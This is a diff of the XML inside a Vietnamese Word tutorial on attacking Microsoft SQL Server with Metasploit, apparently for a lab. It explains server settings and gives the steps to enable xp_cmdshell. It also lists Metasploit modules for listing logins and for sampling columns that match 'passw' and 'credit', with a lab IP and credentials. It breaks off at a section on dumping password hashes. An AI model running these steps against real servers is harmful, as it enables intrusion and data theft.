--- a/Attack Mssql with Metasploit Framework.docx
+++ b/Attack Mssql with Metasploit Framework.docx
@@ -1776,8 +1776,57 @@
           <w:szCs w:val="26"/>
           <w:lang w:val="vi-VN"/>
         </w:rPr>
-        <w:t xml:space="preserve">remote </w:t>
-      </w:r>
+        <w:t>remote access</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="744"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>Một vài thông tin hiển thị:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1787,39 +1836,16 @@
           <w:szCs w:val="26"/>
           <w:lang w:val="vi-VN"/>
         </w:rPr>
-        <w:t>access</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="744"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>Một vài thông tin hiển thị:</w:t>
+        <w:t>TCP Enabled</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>: True: Điều này có nghĩa là máy chủ SQL Server đã được cấu hình để lắng nghe các kết nối TCP1. TCP (Transmission Control Protocol) là một giao thức truyền thông mạng phổ biến, cho phép hai máy tính trao đổi dữ liệu.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1847,16 +1873,16 @@
           <w:szCs w:val="26"/>
           <w:lang w:val="vi-VN"/>
         </w:rPr>
-        <w:t>TCP Enabled</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>: True: Điều này có nghĩa là máy chủ SQL Server đã được cấu hình để lắng nghe các kết nối TCP1. TCP (Transmission Control Protocol) là một giao thức truyền thông mạng phổ biến, cho phép hai máy tính trao đổi dữ liệu.</w:t>
+        <w:t>NP Enabled</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>: True: Điều này có nghĩa là máy chủ SQL Server đã được cấu hình để lắng nghe các kết nối qua Named Pipes. Named Pipes là một giao thức truyền thông mạng khác, thường được sử dụng cho các kết nối trên cùng một máy hoặc trong mạng cục bộ.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1884,16 +1910,16 @@
           <w:szCs w:val="26"/>
           <w:lang w:val="vi-VN"/>
         </w:rPr>
-        <w:t>NP Enabled</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>: True: Điều này có nghĩa là máy chủ SQL Server đã được cấu hình để lắng nghe các kết nối qua Named Pipes. Named Pipes là một giao thức truyền thông mạng khác, thường được sử dụng cho các kết nối trên cùng một máy hoặc trong mạng cục bộ.</w:t>
+        <w:t>RPC Out Enabled</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>: True: Điều này có nghĩa là máy chủ SQL Server cho phép các lời gọi thủ tục từ xa (RPC) tới máy chủ khác. RPC cho phép một chương trình trên một máy tính gọi một thủ tục (tức là một hàm hoặc phương thức) trên máy tính khác.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1921,16 +1947,16 @@
           <w:szCs w:val="26"/>
           <w:lang w:val="vi-VN"/>
         </w:rPr>
-        <w:t>RPC Out Enabled</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>: True: Điều này có nghĩa là máy chủ SQL Server cho phép các lời gọi thủ tục từ xa (RPC) tới máy chủ khác. RPC cho phép một chương trình trên một máy tính gọi một thủ tục (tức là một hàm hoặc phương thức) trên máy tính khác.</w:t>
+        <w:t>DAC Enabled</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>: False: Điều này có nghĩa là Kết nối Quản trị Dành riêng (DAC) trên máy chủ SQL Server hiện đang bị vô hiệu hóa. DAC là một kết nối đặc biệt dành cho quản trị viên, cho phép họ truy cập vào SQL Server để thực hiện các truy vấn chẩn đoán và khắc phục sự cố, ngay cả khi SQL Server không phản hồi các yêu cầu kết nối tiêu chuẩn.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1958,16 +1984,17 @@
           <w:szCs w:val="26"/>
           <w:lang w:val="vi-VN"/>
         </w:rPr>
-        <w:t>DAC Enabled</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>: False: Điều này có nghĩa là Kết nối Quản trị Dành riêng (DAC) trên máy chủ SQL Server hiện đang bị vô hiệu hóa. DAC là một kết nối đặc biệt dành cho quản trị viên, cho phép họ truy cập vào SQL Server để thực hiện các truy vấn chẩn đoán và khắc phục sự cố, ngay cả khi SQL Server không phản hồi các yêu cầu kết nối tiêu chuẩn.</w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t>xp_cmdshell</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>: Đây là một thủ tục lưu trữ mở rộng trong SQL Server, cho phép bạn thực thi các lệnh hệ điều hành Windows từ SQL Server. Ví dụ, bạn có thể sử dụng xp_cmdshell để thực hiện lệnh ‘dir’ để liệt kê tất cả các tệp trong một thư mục cụ thể. Tuy nhiên, xp_cmdshell là một tính năng mạnh mẽ và bị vô hiệu hóa theo mặc định vì nó có thể được sử dụng để thực hiện các hoạt động độc hại nếu rơi vào tay sai.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1995,36 +2022,27 @@
           <w:szCs w:val="26"/>
           <w:lang w:val="vi-VN"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>xp_cmdshell</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>: Đây là một thủ tục lưu trữ mở rộng trong SQL Server, cho phép bạn thực thi các lệnh hệ điều hành Windows từ SQL Server. Ví dụ, bạn có thể sử dụng xp_cmdshell để thực hiện lệnh ‘dir’ để liệt kê tất cả các tệp trong một thư mục cụ thể. Tuy nhiên, xp_cmdshell là một tính năng mạnh mẽ và bị vô hiệu hóa theo mặc định vì nó có thể được sử dụng để thực hiện các hoạt động độc hại nếu rơi vào tay sai.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="10"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t>Remote Access</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>: Đây là khả năng truy cập vào SQL Server từ một khoảng cách xa để thao tác dữ liệu đang được lưu trữ trên SQL Server. Tính năng này cho phép bạn thực hiện các thủ tục lưu trữ từ các máy chủ cục bộ hoặc từ xa mà các phiên bản SQL Server đang chạy. Tuy nhiên, việc cấu hình truy cập từ xa cũng cần được thực hiện cẩn thận để tránh các vấn đề bảo mật.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -2033,39 +2051,7 @@
           <w:szCs w:val="26"/>
           <w:lang w:val="vi-VN"/>
         </w:rPr>
-        <w:t>Remote Access</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>: Đây là khả năng truy cập vào SQL Server từ một khoảng cách xa để thao tác dữ liệu đang được lưu trữ trên SQL Server. Tính năng này cho phép bạn thực hiện các thủ tục lưu trữ từ các máy chủ cục bộ hoặc từ xa mà các phiên bản SQL Server đang chạy. Tuy nhiên, việc cấu hình truy cập từ xa cũng cần được thực hiện cẩn thận để tránh các vấn đề bảo mật.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1104"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Cách bật </w:t>
-      </w:r>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2075,148 +2061,156 @@
           <w:szCs w:val="26"/>
           <w:lang w:val="vi-VN"/>
         </w:rPr>
-        <w:t>xp_cmdshell</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1104"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>-- this turns on advanced options and is needed to configure xp_cmdshell</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1104"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>EXEC sp_configure 'show advanced options', '1'</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1104"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>RECONFIGURE</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1104"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>-- this enables xp_cmdshell</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1104"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>EXEC sp_configure 'xp_cmdshell', '1'</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1104"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>RECONFIGURE</w:t>
+        <w:t>Liệt kê danh sách người dùng</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>use auxiliary/admin/mssql/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>mssql_enum_sql_login</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> set RHOSTS [ip_address].</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> set username [username].</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> set password [password].</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>exploit.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2246,7 +2240,7 @@
           <w:szCs w:val="26"/>
           <w:lang w:val="vi-VN"/>
         </w:rPr>
-        <w:t>Liệt kê danh sách người dùng</w:t>
+        <w:t>Tìm tất cả các thông tin các cơ sở dữ liệu khớp với từ khóa trong tùy chọn keywords</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2282,7 +2276,7 @@
           <w:szCs w:val="26"/>
           <w:lang w:val="vi-VN"/>
         </w:rPr>
-        <w:t>mssql_enum_sql_login</w:t>
+        <w:t>mssql_findandsampledata</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2308,7 +2302,7 @@
           <w:szCs w:val="26"/>
           <w:lang w:val="vi-VN"/>
         </w:rPr>
-        <w:t xml:space="preserve"> set RHOSTS [ip_address].</w:t>
+        <w:t>set rhosts 192.168.1.3</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2334,7 +2328,7 @@
           <w:szCs w:val="26"/>
           <w:lang w:val="vi-VN"/>
         </w:rPr>
-        <w:t xml:space="preserve"> set username [username].</w:t>
+        <w:t>set username lowpriv</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2360,7 +2354,7 @@
           <w:szCs w:val="26"/>
           <w:lang w:val="vi-VN"/>
         </w:rPr>
-        <w:t xml:space="preserve"> set password [password].</w:t>
+        <w:t>set password Password@1</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2386,16 +2380,59 @@
           <w:szCs w:val="26"/>
           <w:lang w:val="vi-VN"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>exploit.</w:t>
+        <w:t>set sample_size 4: chọn 4 bản ghi từ mỗi bảng bị ảnh hưởng hay thỏa mãn keywords.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>set keywords FirstName|passw|credit: tìm tất cả các cột khớp với từ khóa sau keywords.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>Exploit.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2449,9 +2486,158 @@
           <w:lang w:val="vi-VN"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Tìm tất cả các thông tin các cơ sở dữ liệu</w:t>
-      </w:r>
-      <w:r>
+        <w:t>Trích xuất tên người dùng và băm mật khẩu</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>use auxiliary/scanner/mssql/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
